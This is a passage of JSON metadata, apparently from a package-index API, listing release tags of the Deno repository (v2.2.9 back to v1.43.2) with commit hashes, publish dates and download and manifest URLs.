b.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg